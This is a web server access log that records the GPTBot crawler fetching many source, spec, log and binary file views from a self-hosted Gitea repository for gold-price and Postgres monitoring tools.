"/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12348] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12511] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12420] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" +[17/Feb/2026:17:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12586] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" +[17/Feb/2026:17:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11449] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12418] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18606] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21362] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" +[17/Feb/2026:17:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12373] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12310] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11477] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 10820] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18575] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17363] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12538] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17365] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14500] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:17:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" +[17/Feb/2026:17:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 10790] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11253] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11476] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec?display=source" [Client 74.7.227.38] [Length 12245] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13153] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:17:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12310] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 20885] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 18018] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19410] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12586] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" +[17/Feb/2026:17:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt?display=source" [Client 74.7.227.38] [Length 12105] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12540] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12343] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py?display=source" [Client 74.7.227.38] [Length 12885] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" +[17/Feb/2026:17:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec?display=source" [Client 74.7.227.38] [Length 12372] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" +[17/Feb/2026:17:27:13 +0000] - 200 200 - GET https 